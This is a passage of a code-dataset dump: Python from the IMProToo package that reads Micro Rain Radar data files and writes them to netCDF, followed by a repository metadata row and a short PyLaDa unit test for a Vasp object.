if type(fname) is str:
if os.path.splitext(fname)[1] in ('.nc', '.cdf'):
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
if pyNc:
cdfFile = nc.Dataset(fname, "r", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fname, "r")
self.header = cdfFile.getncattr('mrrHeader')
self.mrrTimestamps = cdfFile.variables['time'][:]
self.mrrH = cdfFile.variables['MRR_H'][:]
self.mrrTF = cdfFile.variables['MRR_TF'][:]
self.mrrF = cdfFile.variables['MRR_F'][:]
self.mrrD = cdfFile.variables['MRR_D'][:]
self.mrrN = cdfFile.variables['MRR_N'][:]
self.mrrK = cdfFile.variables['MRR_K'][:]
self.mrrCapitalZ = cdfFile.variables['MRR_Capital_Z'][:]
self.mrrSmallz = cdfFile.variables['MRR_Small_z'][:]
self.mrrPIA = cdfFile.variables['MRR_PIA'][:]
self.mrrRR = cdfFile.variables['MRR_RR'][:]
self.mrrLWC = cdfFile.variables['MRR_LWC'][:]
self.mrrW = cdfFile.variables['MRR_W'][:]
cdfFile.close()
self.shape2D = np.shape(self.mrrH)
self.shape3D = np.shape(self.mrrF)
return
# some helper functions!
def splitMrrAveData(string, debugTime, floatInt):
'''
splits one line of mrr data into list
@parameter string (str) string of MRR data
@parameter debugTime (int) time for debug output
@parameter floatInt (type) convert float or integer
@retrun array with mrr data
'''
listOfData = list()
listOfData_append = listOfData.append
i_start = 3
i_offset = 7
try:
for k in np.arange(i_start, i_offset*31, i_offset):
listOfData_append(mrrDataEsc(
string[k:k+i_offset], floatInt))
except:
# try to fix MRR bug
print("repairing data at " + str(unix2date(debugTime)))
string = string.replace("10000.0", "10000.")
string = string.replace("1000.00", "1000.0")
string = string.replace("100.000", "100.00")
string = string.replace("10.0000", "10.000")
string = string.replace("1.00000", "1.0000")
listOfData = list()
listOfData_append = listOfData.append
for k in np.arange(i_start, i_offset*31, i_offset):
try:
listOfData_append(mrrDataEsc(
string[k:k+i_offset], floatInt))
except:
print("######### Warning, Corrupt data at " + str(unix2date(debugTime)
) + ", position "+str(k)+": " + string+" #########")
listOfData_append(np.nan)
return np.array(listOfData)
def mrrDataEsc(string, floatInt):
"""
set invalid data to nan!
@parameter string (str): string from mrr data
@parameter floatInt (function): int or float function
@return - float or int number
"""
if (string == " "*7) or (len(string) != 7):
return np.nan
else:
return floatInt(string)
if type(fname) == list:
files = fname
else:
files = glob.glob(fname)
files.sort()
foundAtLeastOneFile = False
# go through all files
for f, file in enumerate(files):
if verbosity > 1:
print("%s of %s:" % (f+1, len(files)), file)
# open file, gzip or ascii
try:
if file[-3:] == ".gz":
try:
allData = gzip.open(file, 'rt')
except:
print("could not open:", file)
raise IOError("could not open:" + file)
else:
try:
# without errors='ignore', post-processing script crashes
# when loading MRR raw file with some missing/corrupt data
# using codecs.open(... encoding='UTF-8' ...) as this seems to be
# the only method that works in python 2 and 3.
allData = codecs.open(file, 'r', encoding='UTF-8', errors='ignore')
except:
print("could not open:", file)
raise IOError("could not open:" + file)
if len(allData.read(10)) == 0:
print(file, "empty!")
allData.close()
raise IOError("File empty")
else:
allData.seek(0)
i = 0
except IOError:
print("skipping...", file)
continue
foundAtLeastOneFile = True
# go through file and make a dictionary with timestamp as key and all corresponding lines of data as values
dataMRR = {}
prevDate = 0
tmpList = list()
for line in allData:
if line[0:3] == "MRR":
if i != 0:
dataMRR[prevDate] = tmpList
tmpList = []
asciiDate = line[4:20]
# We must have UTC!
if (re.search("UTC", line) == None):
sys.exit("Warning, line must start with UTC!")
date = datetime.datetime(year=2000+int(asciiDate[0:2]), month=int(asciiDate[2:4]), day=int(
asciiDate[4:6]), hour=int(asciiDate[6:8]), minute=int(asciiDate[8:10]), second=int(asciiDate[10:12]))
date = int(date2unix(date))
tmpList.append(line)
prevDate = date
else:
tmpList.append(line)
i += 1
dataMRR[prevDate] = tmpList
allData.close()
try:
del dataMRR[0]
print("Warning: some lines without timestamp")
except:
pass
if debugLimit == 0:
debugLimit = len(list(dataMRR.keys()))
# create arrays for data
aveTimestamps = np.array(np.sort(list(dataMRR.keys()))[
0:debugLimit], dtype=int)
aveH = np.ones((debugLimit, 31), dtype=float)*np.nan
aveTF = np.ones((debugLimit, 31), dtype=float)*np.nan
aveF = np.ones((debugLimit, 31, 64), dtype=float)*np.nan
aveN = np.ones((debugLimit, 31, 64), dtype=float)*np.nan
aveD = np.ones((debugLimit, 31, 64), dtype=float)*np.nan
aveK = np.ones((debugLimit, 31), dtype=float)*np.nan
aveCapitalZ = np.ones((debugLimit, 31), dtype=float)*np.nan
aveSmallz = np.ones((debugLimit, 31), dtype=float)*np.nan
avePIA = np.ones((debugLimit, 31), dtype=float)*np.nan
aveRR = np.ones((debugLimit, 31), dtype=float)*np.nan
aveLWC = np.ones((debugLimit, 31), dtype=float)*np.nan
aveW = np.ones((debugLimit, 31), dtype=float)*np.nan
# go through timestamps and fill up arrays
for t, timestamp in enumerate(aveTimestamps[0:debugLimit]):
# print unix2date(timestamp)
dataSet = dataMRR[timestamp]
for dataLine in dataSet:
if dataLine[0:3] == "MRR":
# just one is stored, thus no array
self.header = dataLine[21:-2]
continue # print timestamp
elif dataLine[0:3] == "H ":
aveH[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "TF ":
aveTF[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue # print "TF"
elif dataLine[0:1] == "F":
try:
specBin = int(dataLine[1:3])
except:
print("######### Warning, Corrupt data header at " +
str(unix2date(timestamp)) + ", " + dataLine+" #########")
continue
aveF[t, :, specBin] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:1] == "D":
try:
specBin = int(dataLine[1:3])
except:
print("######### Warning, Corrupt data header at " +
str(unix2date(timestamp)) + ", " + dataLine+" #########")
continue
aveD[t, :, specBin] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:1] == "N":
try:
specBin = int(dataLine[1:3])
except:
print("######### Warning, Corrupt data header at " +
str(unix2date(timestamp)) + ", " + dataLine+" #########")
continue
aveN[t, :, specBin] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "K ":
aveK[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "PIA":
avePIA[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "Z ":
aveCapitalZ[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "z ":
aveSmallz[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "RR ":
aveRR[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "LWC":
aveLWC[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "W ":
aveW[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif len(dataLine) == 2:
continue
else:
print("? Line not recognized:", str(
unix2date(timestamp)), dataLine, len(dataLine))
# join arrays of different files
try:
self.mrrTimestamps = np.concatenate(
(self.mrrTimestamps, aveTimestamps), axis=0)
self.mrrH = np.concatenate((self.mrrH, aveH), axis=0)
self.mrrTF = np.concatenate((self.mrrTF, aveTF), axis=0)
self.mrrF = np.concatenate((self.mrrF, aveF), axis=0)
self.mrrN = np.concatenate((self.mrrN, aveN), axis=0)
self.mrrD = np.concatenate((self.mrrD, aveD), axis=0)
self.mrrK = np.concatenate((self.mrrK, aveK), axis=0)
self.mrrPIA = np.concatenate((self.mrrPIA, avePIA), axis=0)
self.mrrCapitalZ = np.concatenate(
(self.mrrCapitalZ, aveCapitalZ), axis=0)
self.mrrSmallz = np.concatenate(
(self.mrrSmallz, aveSmallz), axis=0)
self.mrrRR = np.concatenate((self.mrrRR, aveRR), axis=0)
self.mrrLWC = np.concatenate((self.mrrLWC, aveLWC), axis=0)
self.mrrW = np.concatenate((self.mrrW, aveW), axis=0)
except AttributeError:
self.mrrTimestamps = aveTimestamps
self.mrrH = aveH
self.mrrTF = aveTF
self.mrrF = aveF
self.mrrN = aveN
self.mrrD = aveD
self.mrrK = aveK
self.mrrPIA = avePIA
self.mrrCapitalZ = aveCapitalZ
self.mrrSmallz = aveSmallz
self.mrrRR = aveRR
self.mrrLWC = aveLWC
self.mrrW = aveW
if foundAtLeastOneFile == False:
print("NO DATA")
raise UnboundLocalError
try:
self.header
except:
print("did not find any MRR data in file!")
raise IOError("did not find any MRR data in file!")
del aveTimestamps, aveH, aveTF, aveF, aveN, aveD, aveK, avePIA, aveCapitalZ, aveSmallz, aveRR, aveLWC, aveW
if maskData:
self.mrrTimestamps = np.ma.masked_array(
self.mrrTimestamps, np.isnan(self.mrrTimestamps))
self.mrrH = np.ma.masked_array(self.mrrH, np.isnan(self.mrrH))
self.mrrTF = np.ma.masked_array(self.mrrTF, np.isnan(self.mrrTF))
self.mrrF = np.ma.masked_array(self.mrrF, np.isnan(self.mrrF))
self.mrrN = np.ma.masked_array(self.mrrN, np.isnan(self.mrrN))
self.mrrD = np.ma.masked_array(self.mrrD, np.isnan(self.mrrD))
self.mrrK = np.ma.masked_array(self.mrrK, np.isnan(self.mrrK))
self.mrrPIA = np.ma.masked_array(
self.mrrPIA, np.isnan(self.mrrPIA))
self.mrrCapitalZ = np.ma.masked_array(
self.mrrCapitalZ, np.isnan(self.mrrCapitalZ))
self.mrrSmallz = np.ma.masked_array(
self.mrrSmallz, np.isnan(self.mrrSmallz))
self.mrrRR = np.ma.masked_array(self.mrrRR, np.isnan(self.mrrRR))
self.mrrLWC = np.ma.masked_array(
self.mrrLWC, np.isnan(self.mrrLWC))
self.mrrW = np.ma.masked_array(self.mrrW, np.isnan(self.mrrW))
self.shape2D = np.shape(self.mrrH)
self.shape3D = np.shape(self.mrrF)
if verbosity > 0:
print("done reading")
# end def __init__
def writeNetCDF(self, fileOut, author="IMProToo", location="", institution="", ncForm="NETCDF3_CLASSIC"):
'''
writes MRR Average or Instantaneous Data into Netcdf file
@parameter fileOut (str): netCDF file name
@parameter author (str): Author for netCDF meta data (default:IMProToo)
@parameter location (str): Location of instrument for NetCDF Metadata (default: "")
@parameter institution (str): Institution to whom the instrument belongs (default: "")
@parameter ncForm (str): netCDF Format, possible values are NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4 for the python-netcdf4 package, NETCDF3 takes the "old" Scientific.IO.NetCDF module, which is a bit more convinient to install or as fall back option python-netcdf3
'''
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
if pyNc:
cdfFile = nc.Dataset(fileOut, "w", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fileOut, "w")
fillVDict = dict()
# little cheat to avoid hundreds of if, else...
if pyNc:
fillVDict["fill_value"] = self.missingNumber
print("writing %s ..." % (fileOut))
# Attributes
cdfFile.history = 'Created with IMProToo v' + __version__
cdfFile.author = 'Max Maahn'
cdfFile.processing_date = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S UTC")
cdfFile.reference = 'Maahn, M. and Kollias, P., 2012: Improved Micro Rain Radar snow measurements using Doppler spectra post-processing, Atmos. Meas. Tech., 5, 2661-2673, doi:10.5194/amt-5-2661-2012. '
cdfFile.title = 'Micro rain radar averaged data (Metek standard output) converted to netcdf'
cdfFile.comment = 'This data is only valid in case of liquid precipitation. Note that this data has been processed regardless of precipitation type and additional external information about precipitation type is needed for correct interpretation of the measurements.'
cdfFile.institution = institution
cdfFile.contact_person = author
cdfFile.source = 'MRR-2'
cdfFile.location = location
cdfFile.mrrHeader = self.header
# Dimensions
cdfFile.createDimension('MRR rangegate', 31)
cdfFile.createDimension('time', None) # allows Multifile read
cdfFile.createDimension('MRR spectralclass', 64)
nc_times = cdfFile.createVariable('time', 'i', ('time',), **fillVDict)
nc_ranges = cdfFile.createVariable(
'MRR rangegate', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_classes = cdfFile.createVariable(
'MRR spectralclass', 'i', ('MRR spectralclass',))
nc_times.units = 'seconds since 1970-01-01 00:00:00'
nc_ranges.units = 'm'
nc_classes.units = 'none'
# Create Variables
nc_h = cdfFile.createVariable(
'MRR_H', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_h.units = 'm'
nc_tf = cdfFile.createVariable(
'MRR_TF', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_tf.units = 'none'
nc_f = cdfFile.createVariable(
'MRR_F', 'f', ('time', 'MRR rangegate', 'MRR spectralclass',), **fillVDict)
nc_f.units = 'dB'
nc_d = cdfFile.createVariable(
'MRR_D', 'f', ('time', 'MRR rangegate', 'MRR spectralclass',), **fillVDict)
nc_d.units = 'mm'
nc_n = cdfFile.createVariable(
'MRR_N', 'f', ('time', 'MRR rangegate', 'MRR spectralclass',), **fillVDict)
nc_n.units = 'm^-3 mm^-1'
nc_k = cdfFile.createVariable(
'MRR_K', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_k.units = 'dB'
nc_capitalZ = cdfFile.createVariable(
'MRR_Capital_Z', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_capitalZ.units = 'dBz'
nc_smallz = cdfFile.createVariable(
'MRR_Small_z', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_smallz.units = 'dBz'
nc_pia = cdfFile.createVariable(
'MRR_PIA', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_pia.units = 'dB'
nc_rr = cdfFile.createVariable(
'MRR_RR', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_rr.units = 'mm/h'
nc_lwc = cdfFile.createVariable(
'MRR_LWC', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_lwc.units = 'g/m^3'
nc_w = cdfFile.createVariable(
'MRR_W', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_w.units = 'm s^-1'
# fill dimensions
nc_classes[:] = np.arange(0, 64, 1, dtype="i4")
nc_times[:] = np.array(self.mrrTimestamps, dtype="i4")
nc_ranges[:] = np.array(self.mrrH, dtype="f4")
# fill data
nc_h[:] = np.array(self.mrrH, dtype="f4")
nc_tf[:] = np.array(self.mrrTF, dtype="f4")
nc_f[:] = np.array(self.mrrF, dtype="f4")
nc_d[:] = np.array(self.mrrD, dtype="f4")
nc_n[:] = np.array(self.mrrN, dtype="f4")
nc_k[:] = np.array(self.mrrK, dtype="f4")
nc_capitalZ[:] = np.array(self.mrrCapitalZ, dtype="f4")
nc_smallz[:] = np.array(self.mrrSmallz, dtype="f4")
nc_pia[:] = np.array(self.mrrPIA, dtype="f4")
nc_rr[:] = np.array(self.mrrRR, dtype="f4")
nc_lwc[:] = np.array(self.mrrLWC, dtype="f4")
nc_w[:] = np.array(self.mrrW, dtype="f4")
# commented because of Ubuntu bug: https://bugs.launchpad.net/ubuntu/+source/python-scientific/+bug/1005571
# if not pyNc:
##import pdb;pdb.set_trace()
#nc_ranges._FillValue =float(self.missingNumber)
#nc_tf._FillValue =float(self.missingNumber)
#nc_f._FillValue =float(self.missingNumber)
#nc_d._FillValue =float(self.missingNumber)
#nc_n._FillValue =float(self.missingNumber)
#nc_k._FillValue =float(self.missingNumber)
#nc_capitalZ._FillValue =float(self.missingNumber)
#nc_smallz._FillValue =float(self.missingNumber)
#nc_pia._FillValue =float(self.missingNumber)
#nc_rr._FillValue =float(self.missingNumber)
#nc_lwc._FillValue =float(self.missingNumber)
#nc_w._FillValue =float(self.missingNumber)
cdfFile.close()
print("done")
# end def writeNetCDF
# end class MrrData
class mrrRawData:
'''
Class to read MRR raw data
includes function to save data to netcdf
'''
missingNumber = -9999
def __init__(self, fname, debugStart=0, debugLimit=0, maskData=True, ncForm="NETCDF3_CLASSIC"):
"""
reads MRR raw data. The data is not converted, no magic! The input files can be .gz compressed.
A single netCDF file can be input, that was previously created from mrrRawData.writeNetCDF()
Invalid or Missing data is marked as nan and masked
Since MRR raw data can contains all teh data transfered on the serial bus, a lot warnings can be raised. Usually these can be ignored.
@parameter fname (str or list): list of files or Filename, wildcards allowed!
a single netCDF filename if reading from a file previously
created by mrrProcessedData.writeNetCDF()
@parameter debugstart (int): start after debugstart timestamps
@parameter debugLimit (int): stop after debugLimit timestamps
@parameter ncForm (string): set netCDF format
provides:
mrrRawTime (numpy int64): timestamps in seconds since 01-01-1970 (time)
mrrRawHeight (numpy float64): height levels (time*height)
mrrRawTF (numpy float64): Transfer function (time*height)
mrrRawSpectrum (numpy float64): spectral reflectivities of MRR raw data (time*height*velocity)
"""
# only provided in newer Firmware, has to be guessed for older ones
self.defaultSpecPer10Sec = 58
self.timezone = None
# If this is a single filename input, and it is a netCDF
# (extension is nc or cdf), then read it directly and return.
if type(fname) is str:
if os.path.splitext(fname)[1] in ('.nc', '.cdf'):
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
if pyNc:
cdfFile = nc.Dataset(fname, "r", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fname, "r")
self.header = cdfFile.getncattr('mrrHeader')
self.mrrRawCC = cdfFile.getncattr('mrrCalibrationConstant')
self.mrrRawHeight = cdfFile.variables['MRR rangegate'][:]
self.mrrRawTime = cdfFile.variables['MRR time'][:]
self.mrrRawTF = cdfFile.variables['MRR_TF'][:]
self.mrrRawSpectrum = cdfFile.variables['MRR_Spectra'][:]
self.mrrRawNoSpec = cdfFile.variables['MRR_NoSpectra'][:]
try:
self.timezone = str(cdfFile.variables['MRR time'].timezone)
except AttributeError:
# this can occur when loading a file created with an older
# version of IMProToo, before the timezone update.
warnings.warn("timezone attribute missing, assuming UTC")
self.timezone = "UTC"
cdfFile.close()
self.shape2D = np.shape(self.mrrRawHeight)
self.shape3D = np.shape(self.mrrRawSpectrum)
return
# some helper functions
def rawEsc(string, floatInt):
"""
set invalid data to nan!
@parameter string (str): string from mrr data
@parameter floatInt (function): int or float function
@return - float or int number
"""
if (string == " "*9) or (len(string) != 9):
return np.nan
else:
return floatInt(string)
def splitMrrRawData(string, debugTime, floatInt, startI):
'''
splits one line of mrr raw data into list
@parameter string (str) string of MRR data
@parameter debugTime (int) time for debug output
@parameter floatInt (type) convert float or integer
@parameter startI (int) first data index, old file format 6, new 3
@retrun array with mrr data
'''
instData = list()
instData_append = instData.append
for k in np.arange(startI, 9*32, 9):
try:
instData_append(rawEsc(string[k:k+9], floatInt))
except:
print("######### Warning, Corrupt data at " + str(unix2date(debugTime)) +
", " + str(timestamp) + ", position "+str(k)+": " + string+" #########")
instData_append(np.nan)
return np.array(instData)
if type(fname) == list:
files = fname
else:
files = glob.glob(fname)
files.sort()
foundAtLeastOneFile = False
# go thorugh all files
for f, file in enumerate(files):
print("%s of %s:" % (f+1, len(files)), file)
# open file gz or ascii
try:
if file[-3:] == ".gz":
try:
allData = gzip.open(file, 'rt')
except:
print("could not open:", file)
raise IOError("could not open:" + file)
else:
try:
# without errors='ignore', post-processing script crashes
# when loading MRR raw file with some missing/corrupt data
# using codecs.open(... encoding='UTF-8' ...) as this seems to be
# the only method that works in python 2 and 3.
allData = codecs.open(file, 'r', encoding='UTF-8', errors='ignore')
except:
print("could not open:", file)
raise IOError("could not open:" + file)
if len(allData.read(10)) == 0:
print(file, "empty!")
allData.close()
raise IOError("File empty")
else:
allData.seek(0)
i = 0
except IOError:
print("skipping...")
continue
foundAtLeastOneFile = True
# go through file and make a dictionary with timestamp as key and all corresponding lines of data as values
dataMRR = {}
prevDate = 0
tmpList = list()
# preset, is changed in 8 lines if required
fileFormat = "new"
for line in allData:
if line[0:2] == "T:" or line[0:3] == "MRR":
if i != 0:
dataMRR[prevDate] = tmpList
tmpList = []
if line[0:2] == "T:":
asciiDate = line[2:14] # old mrr raw data
fileFormat = "old" # if there
elif line[0:4] == "MRR ":
asciiDate = line[4:16] # new mrr raw spectra
else:
raise IOError("must be either new or old file format!")
# Script wants UTC!
date = datetime.datetime(year=2000+int(asciiDate[0:2]), month=int(asciiDate[2:4]), day=int(
asciiDate[4:6]), hour=int(asciiDate[6:8]), minute=int(asciiDate[8:10]), second=int(asciiDate[10:12]))
date = int(date2unix(date))
tmpList.append(line)
prevDate = date
else:
tmpList.append(line)
i += 1
# end for line
dataMRR[prevDate] = tmpList
allData.close()
try:
del dataMRR[0]
warnings.warn("Warning: some lines without timestamp")
except:
pass
if fileFormat == "new":
startIndex = 3
elif fileFormat == "old":
startIndex = 6
else:
raise IOError("must be either new or old file format!")
if debugLimit == 0:
debugLimit = len(list(dataMRR.keys()))
specLength = debugLimit - debugStart
# create arrays for data
rawSpectra = np.ones((specLength, 32, 64), dtype=int)*np.nan
rawTimestamps = np.array(np.sort(list(dataMRR.keys()))[
debugStart:debugLimit], dtype=int)
rawHeights = np.ones((specLength, 32), dtype=int)*np.nan
rawTFs = np.ones((specLength, 32), dtype=float)*np.nan
rawNoSpec = np.zeros(specLength, dtype=int)
# default value - if the whole file is processed without ever setting mrrRawCC, this
# means the file is not usable for Ze calculations, but there is no workaround there.
self.mrrRawCC = 0
# go through timestamps and fill up arrays
for t, timestamp in enumerate(rawTimestamps):
dataSet = dataMRR[timestamp]
for dataLine in dataSet:
if dataLine[0:2] == "T:" or dataLine[0:3] == "MRR":
# store the first or second header line as an example, but parse every one
# to check for the CC and number of spectra variables. The first header line
# of MRR data might be messed up after starting the MRR, so the second one
# is used if available.
if t in [0, 1]:
self.header = dataLine
headerLineCC, headerLineNumSpectra, timezone = self.parseHeaderLine(
dataLine, fileFormat)
if headerLineCC is not None:
self.mrrRawCC = headerLineCC
if headerLineNumSpectra is not None:
rawNoSpec[t] = headerLineNumSpectra
else:
# if fileFormat is "old", then the default value must always be taken;
# otherwise, use the value from the headerLine, if present, otherwise
# print a warning, since that means the headerLine had a problem.
if fileFormat == "new":
warnings.warn(
'Warning, could not read number of Spectra, taking default instead: '+self.defaultSpecPer10Sec)
rawNoSpec[t] = self.defaultSpecPer10Sec
if self.timezone is None:
self.timezone = timezone
else:
assert self.timezone == timezone
continue # print timestamp
elif dataLine[0:3] == "M:h" or dataLine[0] == "H":
rawHeights[t, :] = splitMrrRawData(
dataLine, timestamp, int, startIndex)
continue # print "H"
elif dataLine[0:4] == "M:TF" or dataLine[0:2] == "TF":
rawTFs[t, :] = splitMrrRawData(
dataLine, timestamp, float, startIndex)
continue # print "TF"
elif dataLine[0:3] == "M:f" or dataLine[0] == "F":
try:
if fileFormat == "old":
specBin = int(dataLine[3:5])
else:
specBin = int(dataLine[1:3])
except:
warnings.warn("######### Warning, Corrupt data header at " + str(
unix2date(timestamp)) + ", " + str(timestamp) + ", " + dataLine+" #########")
continue
rawSpectra[t, :, specBin] = splitMrrRawData(
dataLine, timestamp, int, startIndex)
continue
elif (dataLine[0:2] == "C:") or (dataLine[0:2] == "R:"):
continue
else:
warnings.warn("? Line not recognized:" + dataLine)
# end for t,timestamp
# discard spectra which are only partly valid!
rawSpectra[np.any(np.isnan(rawSpectra), axis=2)] = np.nan
rawSpectra[np.any(np.isnan(rawTFs), axis=1)] = np.nan
rawSpectra[np.any(np.isnan(rawHeights), axis=1)] = np.nan
rawTFs[np.any(np.isnan(rawTFs), axis=1)] = np.nan
rawHeights[np.any(np.isnan(rawHeights), axis=1)] = np.nan
# join arrays of different days
try:
self.mrrRawHeight = np.concatenate(
(self.mrrRawHeight, rawHeights), axis=0)
self.mrrRawTime = np.concatenate(
(self.mrrRawTime, rawTimestamps), axis=0)
self.mrrRawTF = np.concatenate((self.mrrRawTF, rawTFs), axis=0)
self.mrrRawSpectrum = np.concatenate(
(self.mrrRawSpectrum, rawSpectra), axis=0)
self.mrrRawNoSpec = np.concatenate(
(self.mrrRawNoSpec, rawNoSpec), axis=0)
except AttributeError:
self.mrrRawHeight = rawHeights
self.mrrRawTime = rawTimestamps
self.mrrRawTF = rawTFs
self.mrrRawSpectrum = rawSpectra
self.mrrRawNoSpec = rawNoSpec
# end try
# end for f,file
if foundAtLeastOneFile == False:
raise UnboundLocalError("No files found: " + fname)
try:
self.header
except:
print("did not find any MRR data in file!")
raise IOError("did not find any MRR data in file!")
del rawHeights, rawTimestamps, rawTFs, rawSpectra
if maskData:
self.mrrRawHeight = np.ma.masked_array(
self.mrrRawHeight, np.isnan(self.mrrRawHeight))
self.mrrRawTime = np.ma.masked_array(
self.mrrRawTime, np.isnan(self.mrrRawTime))
self.mrrRawTF = np.ma.masked_array(
self.mrrRawTF, np.isnan(self.mrrRawTF))
self.mrrRawSpectrum = np.ma.masked_array(
self.mrrRawSpectrum, np.isnan(self.mrrRawSpectrum))
self.shape2D = np.shape(self.mrrRawHeight)
self.shape3D = np.shape(self.mrrRawSpectrum)
# end def __init__
@staticmethod
def parseHeaderLine(headerLine, fileFormat):
'''
Parses the raw data header line.
Tries to parse according to the fileFormat ("old", or "new")
Prints a warning if unsuccessful.
'''
tokens = headerLine.split()
CC = None
numSpectra = None
try:
idx = tokens.index('CC')
except:
warnings.warn('Warning, could not find Keyword CC in :'+headerLine)
else:
try:
CC = int(tokens[idx+1])
except:
warnings.warn('Warning, could not read CC in: ' + headerLine)
if fileFormat == "new":
if not tokens[2].startswith("UTC"):
raise IOError("ERROR, timestring must start with UTC!")
timezone = tokens[2]
if tokens[-1] != "RAW":
raise IOError("Was expecting MRR RAW DATA, found: "+tokens[-1])
try:
idx = tokens.index('MDQ')
except:
warnings.warn(
'Warning, could not find Keyword MDQ in :'+headerLine)
else:
try:
numSpectra = int(tokens[idx+2])
except:
warnings.warn(
'Warning, could not read number of Spectra: in ' + headerLine)
elif fileFormat == "old":
if tokens[1] != "UTC":
raise IOError("ERROR, time must be UTC!")
timezone = tokens[1]
else:
raise IOError("must be either new or old file format!")
return CC, numSpectra, timezone
def writeNetCDF(self, fileOut, author="IMProToo", description="MRR Raw Data", ncForm='NETCDF3_CLASSIC'):
'''
writes MRR raw Data into Netcdf file
@parameter fileOut (str): netCDF file name
@parameter author (str): Author for netCDF meta data (default:IMProToo)
@parameter description (str): Description for NetCDF Metadata (default: empty)
@parameter netcdfFormat (str): netcdf format, possible values are NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4 for the python-netcdf4 package, NETCDF3 takes the "old" Scientific.IO.NetCDF module, which is a bit more convinient to install or as fall back option python-netcdf3
'''
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
if pyNc:
cdfFile = nc.Dataset(fileOut, "w", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fileOut, "w")
print("writing %s ..." % (fileOut))
# Attributes
cdfFile.history = 'Created ' + str(time.ctime(time.time()))
cdfFile.source = 'Created by '+author + ' with IMProToo v' + __version__
cdfFile.mrrHeader = self.header
cdfFile.description = description
cdfFile.mrrCalibrationConstant = self.mrrRawCC
fillVDict = dict()
# little cheat to avoid hundreds of if, else...
if pyNc:
fillVDict["fill_value"] = self.missingNumber
# Dimensions
cdfFile.createDimension('MRR rangegate', 32)
cdfFile.createDimension('time', None) # allows Multifile read
cdfFile.createDimension('MRR spectralclass', 64)
nc_times = cdfFile.createVariable(
'MRR time', 'i', ('time',), **fillVDict)
nc_ranges = cdfFile.createVariable(
'MRR rangegate', 'f', ('time', 'MRR rangegate',))
nc_classes = cdfFile.createVariable(
'MRR spectralclass', 'i', ('MRR spectralclass',), **fillVDict)
nc_times.units = 'seconds since 1970-01-01 00:00:00'
nc_times.timezone = self.timezone
nc_ranges.units = 'm'
nc_classes.units = 'none'
# Create Variables
nc_tf = cdfFile.createVariable(
'MRR_TF', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_tf.units = 'none'
nc_spectra = cdfFile.createVariable(
'MRR_Spectra', 'f', ('time', 'MRR rangegate', 'MRR spectralclass',), **fillVDict)
nc_spectra.units = 'none'
nc_noSpec = cdfFile.createVariable(
'MRR_NoSpectra', 'i', ('time',), **fillVDict)
nc_noSpec.units = 'none'
# fill dimensions
nc_classes[:] = np.array(np.arange(0, 64, 1), dtype="i4")
nc_times[:] = np.array(self.mrrRawTime, dtype="i4")
nc_ranges[:] = np.array(self.mrrRawHeight, dtype="f4")
# fill data
nc_tf[:] = np.array(self.mrrRawTF, dtype="f4")
nc_spectra[:] = np.array(self.mrrRawSpectrum, dtype="f4")
nc_noSpec[:] = np.array(self.mrrRawNoSpec, dtype="i4")
# commented because of Ubuntu bug: https://bugs.launchpad.net/ubuntu/+source/python-scientific/+bug/1005571
# if not pyNc:
#nc_noSpec._FillValue =int(self.missingNumber)
#nc_spectra._FillValue =float(self.missingNumber)
#nc_tf._FillValue =float(self.missingNumber)
#nc_ranges._FillValue =float(self.missingNumber)
cdfFile.close()
print("done")
# end def write2NetCDF
# end class MrrData
|
maahn/IMProToo
|
IMProToo/core.py
|
Python
|
gpl-3.0
| 135,969
|
[
"NetCDF"
] |
1c0e3304e6ebd00c51802cffbf02e9d75f2b984f25c87566924844e9c1516cf4
|
###############################
# This file is part of PyLaDa.
#
# Copyright (C) 2013 National Renewable Energy Lab
#
# PyLaDa is a high throughput computational platform for Physics. It aims to make it easier to submit
# large numbers of jobs on supercomputers. It provides a python interface to physical input, such as
# crystal structures, as well as to a number of DFT (VASP, CRYSTAL) and atomic potential programs. It
# is able to organise and launch computational jobs on PBS and SLURM.
#
# PyLaDa is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# PyLaDa is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along with PyLaDa. If not, see
# <http://www.gnu.org/licenses/>.
###############################
def test_system():
from pylada.crystal import Structure
from pylada.vasp import Vasp
a = Vasp()
b = Structure()
assert a.system is None
assert a._input['system'].keyword == 'system'
